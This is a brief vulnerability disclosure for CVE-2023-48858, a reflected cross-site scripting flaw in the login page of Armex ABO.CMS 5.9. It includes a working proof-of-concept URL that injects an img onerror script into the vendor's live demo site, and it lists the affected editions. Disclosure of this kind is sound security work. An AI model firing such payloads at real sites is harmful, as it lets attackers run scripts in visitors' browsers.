PoC for CVE-2023-48858
A Cross-site scripting (XSS) vulnerability in login page php code in
Armex ABO.CMS 5.9 allows remote attackers to inject arbitrary web
script or HTML via the login.php?
URL part.
Proof of Concept:
http://demo.abocms.ru/login.php/eqbzm%22%3E%3Cimg%20src%3d/%20onerror%3dalert%281%29%3Er338y
It isn't specifically "demo" version vulnerability, it was confirmed
in wild on real exposed-to-net website
Link to the demo used here is just to show that this vulnerability persist
Vulnerability Type:
Cross Site Scripting (XSS)
Vendor of Product:
Armex Programming Products (INN 7722635725)
(Presumably) affected products:
ABO.CMS: Start - 5.9
ABO.CMS: Promo - 5.9
ABO.CMS: Corporative - 5.9
ABO.CMS: Shop - 5.9
ABO.CMS: Business - 5.9
ABO.CMS: Bank - 5.9
The problem was found in login.php page, so all versions which use it (login feature) shall be affected. Also I personally don't think anything will change to fix this vulnerability in next versions of ABO.CMS
Reference:
https://abocms.ru/about/versions/version59/
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-48858